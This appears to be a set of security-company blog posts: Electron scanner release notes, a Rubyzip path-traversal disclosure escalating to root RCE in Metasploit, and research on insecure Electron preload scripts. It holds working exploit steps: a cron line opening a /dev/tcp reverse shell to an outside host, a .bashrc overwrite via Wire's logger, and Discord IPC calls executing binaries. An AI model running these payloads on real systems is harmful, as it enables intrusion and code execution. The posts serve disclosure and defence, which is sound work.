Electronegativity 1.3.0 released!

After the first public release of Electronegativity, we received a great response from the community, and the tool quickly became a baseline for Electron application security reviews among many professionals and organizations. This pushed us to keep improving Electronegativity and expanding our research in the field. Today we are proud to release version 1.3.0, with many improvements and new security checks for your Electron applications.


We’re also excited to announce that the tool has been accepted for Black Hat USA Arsenal 2019, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:

$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

What’s New

Electronegativity 1.1.1 initially shipped with 27 unique checks. The tool now counts over 40 checks and features a new, more advanced check system that improves detection and helps weed out false positive and false negative findings. Here is a brief list of what’s new in this 1.3.0 release:

  • Every check now has an importance and an accuracy attribute, which help the auditor prioritize each finding. Consequently, we also introduced new command line flags to filter the results by severity (--severity) and by confidence (--confidence), which is useful for tailoring Electronegativity integration into your application security pipelines or build systems (see the example after this list).
  • We introduced a new class of checks called GlobalChecks, which can dynamically set the severity and confidence of findings, or create new ones, by considering the inherent security risk posed by their interaction (e.g. cross-checking the values of the nodeIntegration and sandbox flags, or the presence of the affinity flag used across different windows).
  • Variable scoping analysis capabilities have been added to inspect the content of function-scoped and global variables, when available.
  • A new single-check scan mode is now provided by passing the -l flag along with a list of enabled checks (e.g. -l "AuxClickJsCheck,AuxClickHtmlCheck"). Another command line flag has been introduced to show relative paths for files (-r).
  • Electron’s newly introduced BrowserView component, meant as an alternative to the webview tag, is now supported. The tool also detects the use of the nodeIntegrationInSubFrames experimental option, which enables Node.js support in sub-frames (e.g. an iframe inside a webview object).
  • Various bug fixes and new checks! (see below)
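
For example, the new flags can be combined in a single scan. The flag and check names below are taken from the list above; the severity and confidence values shown are illustrative and may differ from the exact values accepted by your version (check electronegativity --help):

$ electronegativity -i /path/to/electron/app --severity high --confidence certain
# or run only selected checks and print relative file paths
$ electronegativity -i /path/to/electron/app -l "AuxClickJsCheck,AuxClickHtmlCheck" -r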

Updated Checks

This new release also comes with new and updated checks. As always, a knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities.

Affinity Check

When specified, renderers with the same affinity will run in the same renderer process. Because the renderer process is reused, certain webPreferences options are also shared between the web pages even when you specify different values for them. This can lead to unexpected security configuration overrides:

Affinity Property Vulnerability

In the above demo, the affinity shared between the two BrowserWindow objects causes the nodeIntegration preference value to be unintentionally shared as well. Electronegativity will now issue a finding reporting the usage of this flag whenever it is present.
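
For illustration, a minimal sketch (hypothetical window names and URLs, not the code from the demo above) of two windows sharing the same affinity:

const { app, BrowserWindow } = require('electron')

app.on('ready', () => {
  // First window: Node.js integration explicitly enabled
  const first = new BrowserWindow({
    webPreferences: { affinity: 'myAffinity', nodeIntegration: true }
  })
  // Second window: nodeIntegration is set to false, but since it shares the
  // same affinity (and therefore the same renderer process), this preference
  // may end up being shared with the first window's configuration
  const second = new BrowserWindow({
    webPreferences: { affinity: 'myAffinity', nodeIntegration: false }
  })
  first.loadURL('https://trusted.example')
  second.loadURL('https://untrusted.example')
})

Because both renderers end up in the same process, the effective value of nodeIntegration for the second window may not be the one its author intended.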

Read more on the dedicated AFFINITY_GLOBAL_CHECK wiki page.

AllowPopups Check

When the allowpopups attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.

Read more on the ALLOWPOPUPS_HTML_CHECK wiki page.

Missing Electron Security Patches Detection

This check detects whether security patches are available for the Electron version used by the target application. Starting with this release, we switched from manually updating a list of safe releases to a routine that automatically fetches the latest releases from Electron’s official repository at each run and determines whether security patches are available.

Read more on the AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK and ELECTRON_VERSION_JSON_CHECK wiki pages.

Check for Custom Command Line Arguments

This check will compare the custom command line arguments set in the package.json scripts and configuration objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.
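
While this check parses package.json, the same class of dangerous switches can also be appended programmatically; a minimal sketch of the kind of arguments such a blacklist typically targets (the specific switches below are illustrative examples):

const { app } = require('electron')

// Both switches significantly weaken the application's security posture:
// the first disables the same-origin policy, the second silently accepts
// invalid TLS certificates
app.commandLine.appendSwitch('disable-web-security')
app.commandLine.appendSwitch('ignore-certificate-errors')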

Read more on the CUSTOM_ARGUMENTS_JSON_CHECK wiki page.

CSP Presence Check and Review

Electronegativity now checks whether a Content Security Policy (CSP) is set as an additional layer of protection against cross-site scripting and data injection attacks. If a CSP is detected, it will look for weak directives using a new library based on the csp-evaluator.withgoogle.com online tool.
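
For reference, Electron applications commonly define a CSP either via a meta tag in the renderer or by injecting the header from the main process; a minimal sketch of the latter, based on the pattern in Electron’s security documentation:

const { app, session } = require('electron')

app.on('ready', () => {
  // Attach a restrictive Content-Security-Policy header to every response
  session.defaultSession.webRequest.onHeadersReceived((details, callback) => {
    callback({
      responseHeaders: {
        ...details.responseHeaders,
        'Content-Security-Policy': ["default-src 'self'"]
      }
    })
  })
})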

Read more on the CSP_GLOBAL_CHECK wiki page.

Dangerous JS Functions called with user-supplied data

This check looks for occurrences of insertCSS, executeJavaScript, eval, Function, setTimeout, setInterval and setImmediate being called with user-supplied input.
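
A minimal sketch of the kind of pattern this check flags (win is a BrowserWindow instance; userInput is a hypothetical placeholder for attacker-controlled data):

// win is a BrowserWindow instance; userInput is a hypothetical placeholder
// for attacker-controlled data
function renderUserContent (win, userInput) {
  // Flagged: attacker-controlled data reaches executeJavaScript
  win.webContents.executeJavaScript(userInput)

  // Flagged: classic JavaScript sinks called with user-supplied input
  eval(userInput)
  setTimeout(userInput, 1000)
}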

Read more on the DANGEROUS_FUNCTIONS_JS_CHECK wiki page.

Check for mitigations set to limit the navigation flows

This check detects whether on() handlers for the will-navigate and new-window events are in use. These handlers can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under the full control of remote origins in case of accidental navigation.
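
A minimal sketch of such a mitigation, following the pattern recommended in Electron’s security checklist (the allowed origin is a hypothetical example):

const { app } = require('electron')
const { URL } = require('url')

app.on('web-contents-created', (event, contents) => {
  // Cancel navigation to anything but the application's own origin
  contents.on('will-navigate', (event, navigationUrl) => {
    if (new URL(navigationUrl).origin !== 'https://app.example.com') {
      event.preventDefault()
    }
  })
  // Block the creation of new windows entirely
  contents.on('new-window', (event) => {
    event.preventDefault()
  })
})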

Read more on the LIMIT_NAVIGATION_GLOBAL_CHECK and LIMIT_NAVIGATION_JS_CHECK wiki pages.

Detects if Electron’s security warnings have been disabled

The tool will check whether Electron’s warnings and recommendations, normally printed to the developer console, have been force-disabled by the developer. Disabling these warnings may hide misconfigurations or insecure patterns from developers.
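
For context, Electron documents two ways to force-disable these warnings; a minimal sketch:

// In the main process or a preload script: silence the warnings via the environment
process.env.ELECTRON_DISABLE_SECURITY_WARNINGS = 'true'

// Or in the renderer: silence them through the window object
window.ELECTRON_DISABLE_SECURITY_WARNINGS = true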

Read more on the SECURITY_WARNINGS_DISABLED_JS_CHECK and SECURITY_WARNINGS_DISABLED_JSON_CHECK wiki pages.

Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under the full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio and video. Because of this, Electronegativity now also checks whether a setPermissionRequestHandler has been set.
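
A minimal sketch of such a handler, adapted from Electron’s documentation (the allowed origin and granted permission are hypothetical examples):

const { app, session } = require('electron')

app.on('ready', () => {
  session.defaultSession.setPermissionRequestHandler((webContents, permission, callback) => {
    const requestingUrl = webContents.getURL()
    // Only grant notification requests coming from the application's own origin
    if (requestingUrl.startsWith('https://app.example.com/') && permission === 'notifications') {
      return callback(true)
    }
    // Deny everything else (media, geolocation, etc.)
    callback(false)
  })
})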

Read more on the PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK wiki page.

…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron security pitfalls affect your application and how to avoid them. We truly believe that Electron deserves a strong security community behind it, and that building the right, robust tools for this community is the first step towards improving the security posture of the whole Electron ecosystem.

As a final remark, we’d like to thank all past and present contributors to this tool: @ikkisoft, @p4p3r, @0xibram, @yarlob, @lorenzostella, and ultimately @Doyensec for sponsoring this release.

See you in Vegas!

@lorenzostella


On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

During one of our projects, we had the opportunity to audit a Ruby on Rails (RoR) web application that handles zip files using the Rubyzip gem. Zip files have always been an interesting entry point for triggering multiple vulnerability classes, including path traversals and symlink file overwrite attacks. As the library under test had symlink processing disabled, we focused on path traversal exploitation.

This blog post discusses our results, the “bug” discovered in the library itself, and the implications of such an issue in a popular piece of software: Metasploit.


Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting is the code change in PR #376, where the developers implemented a different handling of unsafe names.

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe, 
# if it is passed.
def extract(dest_path = nil, &block)
    if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
    end

[...]

Entry#name_safe? is defined a few lines earlier as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
    cleanpath = Pathname.new(@name).cleanpath
    return false unless cleanpath.relative?
    root = ::File::SEPARATOR
    naive_expanded_path = ::File.join(root, cleanpath.to_s)
    cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if a destination path is passed to the Entry#extract function, it is not actually checked. A comment in the source code of that function highlights the caller’s responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While Entry#name_safe? is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug, we generated a PoC ZIP file using the old (and still good) evilarc, and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip 
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip 
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

This results in a file being created at /tmp/file.txt, confirming the issue.

As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase.

It would have been vulnerable anyway ¯\_(ツ)_/¯

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

def unzip(input)
    uuid = get_uuid()
    # 0. create a 'Pathname' object with the new uuid
    parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

    Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
            # 1. check the file is not present
            next if File.file?(parent_directory + entry.name)
            # 2. extract the entry
            entry.extract(parent_directory + entry.name)
        end
    end
    Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the + operator between Pathname objects and strings does not work as many developers would expect and can result in unintended behavior.

We can easily understand its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'              
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

Because Pathname interprets the ../ sequences, the argument passed to Rubyzip’s Entry#extract no longer contains any path traversal payload, which results in a path that is mistakenly assumed to be “safe”. Since the gem does not perform any validation when a destination is passed, exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix- and Windows-specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb file to the config/initializers folder, which will be loaded at the next web server (re)boot.

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement, and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: the Metasploit Framework.

Going through the source code, we were able to quickly identify several files that use the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in the zip.rb file (line 157), which is responsible for importing a Metasploit ZIP file:

data.entries.each do |e|
  target = ::File.join(@import_filedata[:zip_tmp], e.name)
  data.extract(e,target)

As with the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported information from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is performed as root, we could easily obtain remote command execution with high privileges using the following steps:

  1. Create a file with the following content:
    * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  2. Generate the ZIP archive with the path traversal payload:
    python evilarc.py exploit --os unix -p etc/cron.d/
  3. Add a valid MSF workspace to the ZIP file (in order to have MSF extract it; otherwise it will refuse to process the ZIP archive)
  4. Set up two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will receive the reverse shell)
  5. Log in to the MSF web interface
  6. Create a new “Project”
  7. Select “Import”, then “From file”, choose the evil ZIP file and finally click the “Import” button
  8. Wait for the import process to finish
  9. Enjoy your reverse shell


Conclusions

In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract.

Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage               | Input by user?                   | Vulnerable to path traversal?
--------------------|----------------------------------|------------------------------
entry.extract(path) | yes (path)                       | yes
entry.extract(path) | partially (path is concatenated) | maybe
entry.extract()     | partially (entry name)           | no
entry.extract()     | no                               | no

If you’re using Metasploit, it is time to patch. We look forward to seeing an MSF module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict.

This work was performed during a customer engagement and Doyensec’s 25% Research Time. As such, we would like to thank our customer and the Metasploit maintainers for their support.



Subverting Electron Apps via Insecure Preload

We’re back from BlackHat Asia 2019 where we introduced a relatively unexplored class of vulnerabilities affecting Electron-based applications.

Despite popular belief, secure-by-default settings are slowly becoming the norm, and the dev community is gradually learning about common pitfalls. Isolation is now widely deployed across all top Electron applications, so turning XSS into RCE isn’t child’s play anymore.

From Alert to Calc

BrowserWindow preload introduces a new and interesting attack vector. Even without a framework bug (e.g. nodeIntegration bypass), this neglected attack surface can be abused to bypass isolation and access Node.js primitives in a reliable manner.

You can download the slides of our talk from the official BlackHat Briefings archive: http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Carettoni-Preloading-Insecurity-In-Your-Electron.pdf

Preloading Insecurity In Your Electron

Preload is a mechanism to execute code before renderer scripts are loaded. This is generally employed by applications to export functions and objects to the page’s window object as shown in the official documentation:

const { app, BrowserWindow } = require('electron')

let win
app.on('ready', () => {
  win = new BrowserWindow({
    webPreferences: {
      sandbox: true,
      // in real applications, preload is typically specified as an absolute path
      preload: 'preload.js'
    }
  })
  win.loadURL('http://google.com')
})

preload.js can contain custom logic to augment the renderer with easy-to-use functions or application-specific objects:

const fs = require('fs')
const { ipcRenderer } = require('electron')

// read a configuration file using the `fs` module
const buf = fs.readFileSync('allowed-popup-urls.json')
const allowedUrls = JSON.parse(buf.toString('utf8'))

const defaultWindowOpen = window.open

function customWindowOpen (url, ...args) {
  if (allowedUrls.indexOf(url) === -1) {
    ipcRenderer.sendSync('blocked-popup-notification', location.origin, url)
    return null
  }
  return defaultWindowOpen(url, ...args)
}

window.open = customWindowOpen

[...]

While performing numerous assessments on behalf of our clients, we noticed a general lack of awareness around the risks introduced by preload scripts. Even in popular applications that follow all the recommended security best practices, we were able to turn boring XSS into RCE in a matter of hours.

This prompted us to further research the topic and categorize four types of insecure preloads:

  • (1) Preload scripts can reintroduce Node global symbols back to the global scope

    While it is evident that reintroducing some Node global symbols (e.g. process) to the renderer is dangerous, the risk is not immediately obvious for classes like Buffer (which can be leveraged for a nodeIntegration bypass)

  • (2) Preload scripts can introduce functionalities that can be abused by untrusted code

    Preload scripts have access to Node.js, and the functions exported by applications to the global window often include dangerous primitives (see the sketch after this list)

  • (3) Preload scripts can facilitate sandbox bypasses

    Even with the sandbox enabled, preload scripts still have access to Node.js native classes and a few Electron modules. Once again, preload code can leak privileged APIs to untrusted code, which could facilitate sandbox bypasses

  • (4) Without contextIsolation, the integrity of preload scripts is not guaranteed

    When isolated worlds are not in use, prototype pollution attacks can override preload script code. Malicious JavaScript running in the renderer can alter preload functions in order to return different data, bypass checks, etc.
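
As an illustration of type (2), a minimal, hypothetical preload script that exports a seemingly innocuous helper backed by Node.js primitives, which untrusted renderer code can then repurpose:

// preload.js (hypothetical example)
const fs = require('fs')

// Intended use: let the web app read its own configuration file.
// Problem: any code running in the renderer (e.g. via XSS) can call this
// helper with an arbitrary path and read any file the process can access.
window.readConfig = function (path) {
  return fs.readFileSync(path, 'utf8')
}

From the renderer, a single call such as window.readConfig('/etc/passwd') would be enough to turn an XSS into an arbitrary file read.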

In this blog post, we will analyze a couple of vulnerabilities belonging to group (2) which we discovered in two popular applications: Wire App and Discord.

For more vulnerabilities and examples, please refer to our presentation.

WireApp Desktop Arbitrary File Write via Insecure Preload

Wire App is a self-proclaimed “most secure collaboration platform”. It’s a secure messaging app using end-to-end encryption for file sharing, voice, and video calls. The application implements isolation by using a BrowserWindow with nodeIntegration disabled, inside which a webview HTML tag is used.

Wire App frames

Despite enforcing isolation, the web-view-preload.js preload file contains the following code:

const webViewLogger = new winston.Logger();
webViewLogger.add(winston.transports.File, {
  filename: logFilePath,
  handleExceptions: true,
});

webViewLogger.info(config.NAME, 'Version', config.VERSION);

// webapp uses global winston reference to define log level
global.winston = webViewLogger;

Code running in the isolated renderer (e.g. XSS) can override the logger’s transport setting in order to obtain a file write primitive.

This issue can be easily verified by switching to the messages view and opening the webview’s DevTools:

window.document.getElementsByTagName("webview")[0].openDevTools();

Then, executing the following code in the webview’s DevTools console:

function formatme(args) {
  var logMessage = args.message;
  return logMessage;
}

winston.transports.file = (new winston.transports.file.__proto__.constructor({
        dirname: '/home/ikki/',
        level: 'error',
        filename: '.bashrc',
        json: false,
        formatter: formatme
}))

winston.error('xcalc &');


This issue affected all supported platforms (Windows, Mac, Linux). As the sandbox entitlement is enabled on macOS, an attacker would need to chain this issue with another bug to write outside the application folders. Please note that since it is possible to override some application files, RCE may still be possible without a macOS sandbox bypass.

A security patch was released on March 14, 2019, just a few days after our disclosure.

Discord Desktop Arbitrary IPC via Insecure Preload

Discord is a popular voice and text chat application used by over 250 million gamers. The application implements isolation by simply using a BrowserWindow with nodeIntegration disabled. Despite that, the preload script (app/mainScreenPreload.js) used by the same BrowserWindow contains multiple exports, including the following:

var DiscordNative = {
    isRenderer: process.type === 'renderer',
    //..
    ipc: require('./discord_native/ipc'),
};

//..

process.once('loaded', function () {
    global.DiscordNative = DiscordNative;
    //..
});

where app/discord_native/ipc.js contains the following code:

var electron = require('electron');
var ipcRenderer = electron.ipcRenderer;

function send(event) {
  for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    args[_key - 1] = arguments[_key];
  }

  ipcRenderer.send.apply(ipcRenderer, [event].concat(args));
}

function on(event, callback) {
  ipcRenderer.on(event, callback);
}

module.exports = {
  send: send,
  on: on
};

Without going into details, this script is basically a wrapper around Electron’s official asynchronous IPC mechanism, used to exchange messages between the renderer process (web page) and the main process.

In Electron, the ipcMain and ipcRenderer modules are used to implement IPC between the main process and the renderers, but they’re also leveraged for internal native framework invocations. For instance, the window.close() function is implemented using the following event listener:

// Implements window.close()
ipcMainInternal.on('ELECTRON_BROWSER_WINDOW_CLOSE', function (event) {
  const window = event.sender.getOwnerBrowserWindow()
  if (window) {
    window.close()
  }
  event.returnValue = null
})

As there’s no separation between application-level IPC messages and the internal ELECTRON_ channels, the ability to set arbitrary channel names allows untrusted code in the renderer to subvert the framework’s security mechanisms.

For example, the following synchronous IPC calls can be used to execute an arbitrary binary:

(function () {
    var ipcRenderer = require('electron').ipcRenderer
    var electron = ipcRenderer.sendSync("ELECTRON_BROWSER_REQUIRE","electron");
    var shell = ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_GET", electron.id, "shell");
    return ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_CALL", shell.id, "openExternal", [{
                            type: 'value',
                            value: "file:///Applications/Calculator.app"
    }]);
})();

In the case of Discord’s preload, an attacker can issue asynchronous IPC messages with arbitrary channels. While it is not possible to obtain a reference to the returned objects from the function exposed in the untrusted window, an attacker can still brute-force the reference ID of the child_process module using the following code:

DiscordNative.ipc.send("ELECTRON_BROWSER_REQUIRE","child_process");

for(var i=0;i<50;i++){
    DiscordNative.ipc.send("ELECTRON_BROWSER_MEMBER_CALL", i, "exec", [{
            type: 'value',
            value: "calc.exe"
    }]);
}


This issue affected all supported platforms (Windows, Mac, Linux). A security patch was released at the beginning of 2019. Additionally, Discord also removed backwards-compatibility code for old clients.


Electronegativity is finally out!

We’re excited to announce the public release of Electronegativity, an open source tool capable of identifying misconfigurations and security anti-patterns in Electron-based applications.

Electronegativity is a first-of-its-kind tool that helps software developers and security auditors detect and mitigate potential weaknesses in Electron applications.

If you’re simply interested in trying out Electronegativity, go ahead and install it using NPM:

$ npm install @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

Results are displayed in a compact table, with references to application files and our knowledge-base.

Electronegativity Demo

The remainder of this blog post provides more details on the public release and introduces the tool’s current features.

A bit of history

Back in July 2017 at the BlackHat USA Briefings, we presented the first comprehensive study on Electron security where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications.

With that, Claudio Merloni and I started developing the first prototype of Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again, and only minor refinements were made in between customer projects.

In the summer of 2018, we hired Doyensec’s first intern, Ibram Marzouk, who started working on the tool again. Later, Jaroslav Lobacevski joined the project team and pushed Electronegativity to the finish line. Claudio, Ibram and Jaroslav, thanks for your contributions!

While certainly overdue, we’re happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there.

How Does It Work?

Electronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible.

Building a new check is relatively easy too. We support three “families” of checks, so that the tool can analyze all resources within an Electron application:

  • JS checks, which use AST parsing to inspect the application’s JavaScript
  • HTML checks, which use DOM parsing to inspect the application’s HTML pages
  • JSON checks, which inspect the application’s manifest and configuration files (e.g. package.json)

When you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results can be displayed in the terminal or exported in CSV or SARIF format.

Supported Checks

Electronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:

  1. ALLOWPOPUPS_HTML_CHECK
  2. AUXCLICK_JS_CHECK
  3. AUXCLICK_HTML_CHECK
  4. BLINK_FEATURES_JS_CHECK
  5. BLINK_FEATURES_HTML_CHECK
  6. CERTIFICATE_ERROR_EVENT_JS_CHECK
  7. CERTIFICATE_VERIFY_PROC_JS_CHECK
  8. CONTEXT_ISOLATION_JS_CHECK
  9. CUSTOM_ARGUMENTS_JS_CHECK
  10. DANGEROUS_FUNCTIONS_JS_CHECK
  11. ELECTRON_VERSION_JSON_CHECK
  12. EXPERIMENTAL_FEATURES_HTML_CHECK
  13. EXPERIMENTAL_FEATURES_JS_CHECK
  14. HTTP_RESOURCES_JS_CHECK
  15. HTTP_RESOURCES_HTML_CHECK
  16. INSECURE_CONTENT_HTML_CHECK
  17. INSECURE_CONTENT_JS_CHECK
  18. NODE_INTEGRATION_HTML_CHECK
  19. NODE_INTEGRATION_EVENT_JS_CHECK
  20. NODE_INTEGRATION_JS_CHECK
  21. OPEN_EXTERNAL_JS_CHECK
  22. PERMISSION_REQUEST_HANDLER_JS_CHECK
  23. PRELOAD_JS_CHECK
  24. PROTOCOL_HANDLER_JS_CHECK
  25. SANDBOX_JS_CHECK
  26. WEB_SECURITY_HTML_CHECK
  27. WEB_SECURITY_JS_CHECK

Leveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. Start using Electronegativity today!